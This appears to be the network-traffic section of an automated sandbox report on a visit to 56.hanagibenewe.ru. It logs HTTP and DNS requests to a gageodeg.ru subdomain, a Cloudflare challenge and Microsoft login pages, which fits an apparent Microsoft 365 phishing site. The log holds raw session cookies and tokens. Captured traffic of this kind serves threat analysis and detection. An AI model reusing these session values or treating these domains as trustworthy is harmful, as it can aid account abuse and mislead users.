Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902caf840eaa7ce8&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 56.hanagibenewe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://56.hanagibenewe.ru/Y7MD/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJOTm1BYnFIRjRMOEFWb3VZUklzbHc9PSIsInZhbHVlIjoiemF2elZveUJPbUpLNThJZEVhNkFuWjB2cWJjMm1wNXBvVEJVV21nZlFpVDdmUncrWWJKcHZ1UHlLbnR0SGdvTHpJcFQxcnprb20reTZYZ1E4aThTVXk5VlJaM3VUeVJhMmRGV2ZDc1JrWmE1elp5R2tCQkhnbFhHbUxWUFVJTEMiLCJtYWMiOiJiNDE0MmMyNjNkODQ3NDcyZDdkMjZmMWJkMzE3YTA1NGEwZDJhMzcyYzY2NTkxZmIyM2QyMDkxMWZjMzYyNjdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2WlBCMnRNRkljcXBtR3Z5RnRqZVE9PSIsInZhbHVlIjoiZXZGSnY1a3llVTAvRGM0NjRCUVIxamQ1bUJXc2w0NVhGYmZUVW1DTzdpUkowSW1GUVd6V2VkQm9JMEVCQ25JRlhNSmpVbTRGcU1WbG9CUVVkdjVGY0VWMlVNbllVaE1BZTNUTnVJUEhUQlpWbG56K090ZGVNWkpoUnBKenFqaVMiLCJtYWMiOiJjYmNiOWMxMWE3MjNmNWJmMzRkYjlkMjYyYzZkZDI5MTkxOGQzOGEyYjlmNmU1NjFjZDMwOGRiMmI2NGQ0MmQwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902caf840eaa7ce8&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/902caf840eaa7ce8/1737015620917/06803e07f083093b506a25e32cdcc8bb25dfdadec1b4ca42befeb10fcc321d4d/ZZbdEoB7MOUJd5H HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902caf840eaa7ce8/1737015620919/TS7ZMPQmxY7bcfQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902caf840eaa7ce8/1737015620919/TS7ZMPQmxY7bcfQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU HTTP/1.1Host: oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://56.hanagibenewe.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU HTTP/1.1Host: oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://56.hanagibenewe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638726124374492471.ZWI2MmE1ZGQtOWY4OC00YmI3LTk3YTgtNThhOWRjODllYzhmOTJmNzdmMWEtMDE0My00MmI3LWI5MzMtOTgzYzRiZDBkNTgz&ui_locales=en-US&mkt=en-US&client-request-id=bfef4c53-ba37-4e79-a3f1-3523065f2cbd&state=BxNrQKX-EXOyGf3juFnN0J9UdvvsSeV3zW5H59JafvTMXbt0zRhP-5DBevqBmveWpvKqysxZ4gVe2_Ql1Cx1rCqLXNzZLJ-gxAqLMwkx9SAWpfRq-06QDthTPxp__CMNGSsU3maMIxvO5TJMVQcsl4DNueIfZ23yrTxzFTCMGH54aQAASnElahc7OeNQN9Gu5XJoXGHZ_9Sludc2AA0Y2SwqLhDwbMOSF9jE9Nbs9OZO9sb0p8tbA1fqZy6BTLXYBS59RaA39Y6uYfiHyOHnWA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fpc=Ah2mxvmYW6hHh5mjBN3488I; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE673V9FfGFcdE0ly37y6_4pjfgWRpDJs2Tc9R6KZfQaPT6aoNkYBEoxbIpdtShAgVKQhji_ukJid1GpTRxvGmRVZKlg74F0OIrRz0NjSkcpvbVS6jIVLLqdf_BGNO8XMA4iTpcoZf6Uf73_LHiEhHuAV0iMLlSNXlPq_YbEK5ItIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-U6EDcUQ9DgQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEkS-Q0uQ4TjjVzMVNFwWbKIJL9BPWyss2XE1eiaga3SrvlhTF1Mvmx5jfgJiKC80jVaxyNtbYOWMWteacDNbTh1lsWzCjMabjresuFK7iDYKApGpQ4S-vaUW58U-s3RxJTt5RP01gql4Tfa0_KujZcSAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 56.hanagibenewe.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3204sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4csec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
